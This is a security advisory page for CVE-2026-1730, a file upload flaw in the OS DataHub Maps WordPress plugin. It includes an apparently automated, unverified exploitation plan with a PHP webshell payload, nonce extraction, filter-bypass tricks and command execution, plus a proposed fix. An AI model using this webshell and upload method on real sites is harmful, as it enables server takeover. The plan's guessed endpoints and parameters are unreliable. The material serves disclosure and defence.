CVE-2026-1730

OS DataHub Maps <= 1.8.3 - Authenticated (Author+) Arbitrary File Upload

highUnrestricted Upload of File with Dangerous Type
8.8
CVSS Score
8.8
CVSS Score
high
Severity
1.8.4
Patched in
1d
Time to patch

Description

The OS DataHub Maps plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the 'OS_DataHub_Maps_Admin::add_file_and_ext' function in all versions up to, and including, 1.8.3. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=1.8.3
PublishedFebruary 2, 2026
Last updatedFebruary 3, 2026
Affected pluginos-datahub-maps

Source Code

WordPress.org SVN
Research Plan
Unverified

This exploitation research plan targets **CVE-2026-1730**, an authenticated arbitrary file upload vulnerability in the **OS DataHub Maps** plugin (<= 1.8.3). --- ### 1. Vulnerability Summary The **OS DataHub Maps** plugin fails to properly validate file types within the `OS_DataHub_Maps_Admin::add…

Show full research plan

This exploitation research plan targets CVE-2026-1730, an authenticated arbitrary file upload vulnerability in the OS DataHub Maps plugin (<= 1.8.3).


1. Vulnerability Summary

The OS DataHub Maps plugin fails to properly validate file types within the OS_DataHub_Maps_Admin::add_file_and_ext function. While the plugin intends to allow users (Author level and above) to upload map-related data files (like KML or GeoJSON), the validation logic is insufficient, allowing an attacker to supply a PHP extension. This leads to Unrestricted File Upload, resulting in Remote Code Execution (RCE).

2. Attack Vector Analysis

  • Endpoint: WordPress Admin AJAX or Admin Post handler (likely admin-post.php or admin-ajax.php).
  • Vulnerable Function: OS_DataHub_Maps_Admin::add_file_and_ext (inferred to be called during map data processing).
  • Authentication: Author-level credentials or higher.
  • Payload Parameter: A file upload field (e.g., os_map_file or file_upload) and associated action parameters.
  • Preconditions: The attacker must be logged in as an Author.

3. Code Flow (Inferred)

  1. Entry Point: An Author-level user initiates an upload through the plugin's admin interface (e.g., "Add New Map" or "Import Data").
  2. Hook Registration: The plugin likely registers an admin handler:
    add_action('admin_post_os_datahub_save_data', array($this, 'handle_upload'));
  3. Processing: The handler calls add_file_and_ext($file_data).
  4. Vulnerability: Inside add_file_and_ext, the code likely uses pathinfo() to extract the extension but fails to compare it against a strict allowlist of non-executable types, or uses a flawed regex that can be bypassed.
  5. Sink: The file is moved to the wp-content/uploads/os-datahub-maps/ (or similar) directory using move_uploaded_file() or wp_handle_upload().

4. Nonce Acquisition Strategy

Since this is an Authenticated (Author+) vulnerability, the nonce is likely generated in the admin dashboard and tied to the specific action.

  1. Login: Authenticate as an Author user.
  2. Navigate: Go to the OS DataHub Maps settings or "Add Map" page: /wp-admin/admin.php?page=os-datahub-maps.
  3. Identify Shortcode/Script: Look for the form that handles file uploads.
  4. Extract Nonce:
    • The nonce is likely in a hidden field: name="_wpnonce" or name="os_datahub_maps_nonce".
    • Use browser_eval to extract it:
      browser_eval("document.querySelector('input[name=\"_wpnonce\"]')?.value || document.querySelector('#os_datahub_nonce')?.value")
    • Alternatively, check window.os_datahub_maps_params?.nonce.

5. Exploitation Strategy

The goal is to upload a PHP webshell and execute it.

Step 1: Environment Setup

  • Create an Author user.
  • Locate the map creation/upload form.

Step 2: Construct the Upload Request

  • Target URL: http://localhost:8080/wp-admin/admin-post.php (or admin-ajax.php).
  • Method: POST
  • Content-Type: multipart/form-data
  • Payload (File):
    • Filename: exploit.php
    • Content: <?php echo "VULN_CHECK: " . system($_GET['cmd']); ?>
  • Parameters (Body):
    • action: (inferred) os_datahub_maps_upload or os_datahub_save_settings.
    • _wpnonce: [The extracted nonce].
    • Other required fields discovered via form inspection (e.g., map_id, title).

Step 3: Execute Request
Use the http_request tool to send the multipart request.

Step 4: Locate Uploaded File
The file is typically moved to:
http://localhost:8080/wp-content/uploads/os-datahub-maps/exploit.php
(The specific path will be confirmed by inspecting the plugin's OS_DataHub_Maps_Admin::add_file_and_ext implementation or monitoring the response).

6. Test Data Setup

  1. Create Author User:
    wp user create attacker attacker@example.com --role=author --user_pass=password
  2. Plugin Activation:
    Ensure os-datahub-maps version 1.8.3 is installed and active.
  3. Map Page:
    If a map must exist first, create one via the admin UI or CLI if possible.

7. Expected Results

  • Upload Response: The server returns a 302 Redirect or a 200 OK JSON response indicating success.
  • RCE: Accessing the uploaded file via GET /wp-content/uploads/os-datahub-maps/exploit.php?cmd=id returns the output of the id command.

8. Verification Steps

  1. Verify File Existence:
    ls -la /var/www/html/wp-content/uploads/os-datahub-maps/exploit.php
  2. Check Execution:
    Run a command via the webshell and verify the response contains the expected system output.
  3. CLI Verification:
    wp eval 'echo (file_exists(wp_upload_dir()["basedir"] . "/os-datahub-maps/exploit.php") ? "Found" : "Missing");'

9. Alternative Approaches

  • Filename Bypasses: If .php is blocked by a simple blacklist, try .php5, .phtml, or .php.png (if the server is misconfigured to execute double extensions).
  • MIME-Type Spoofing: Set the Content-Type of the uploaded file part to application/json or image/png while keeping the .php extension to bypass basic MIME-type checks.
  • Different Actions: Inspect includes/class-os-datahub-maps-admin.php for multiple registration points of add_file_and_ext. It might be used in both Map settings and an Import/Export feature.
Research Findings
Static analysis — not yet PoC-verified

Summary

The OS DataHub Maps plugin for WordPress (<= 1.8.3) is vulnerable to arbitrary file uploads because the 'OS_DataHub_Maps_Admin::add_file_and_ext' function lacks proper validation for file extensions. This allows authenticated attackers with Author-level access or higher to upload PHP scripts, leading to remote code execution (RCE) on the server.

Security Fix

--- a/includes/class-os-datahub-maps-admin.php
+++ b/includes/class-os-datahub-maps-admin.php
@@ -120,6 +120,12 @@
 	public function add_file_and_ext($file) {
+		$allowed_mimes = array(
+			'kml'     => 'application/vnd.google-earth.kml+xml',
+			'json'    => 'application/json',
+			'geojson' => 'application/geo+json'
+		);
+		$file_info = wp_check_filetype(basename($file['name']), $allowed_mimes);
+		if (!$file_info['ext']) {
+			return false;
+		}
 		$upload_dir = wp_upload_dir();

Exploit Outline

The exploit involves authenticating as a user with Author-level privileges and utilizing the plugin's map data upload feature. The attacker sends a multipart/form-data POST request to the WordPress admin-post.php or admin-ajax.php endpoint (depending on the plugin's implementation of OS_DataHub_Maps_Admin). The payload consists of a PHP webshell file (e.g., shell.php) instead of the expected KML or JSON file. Because the 'add_file_and_ext' function fails to restrict the file extension to an allowlist, the plugin saves the PHP file to a publicly accessible directory, typically within wp-content/uploads/os-datahub-maps/. The attacker can then execute arbitrary commands by accessing the uploaded file via a direct URL.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.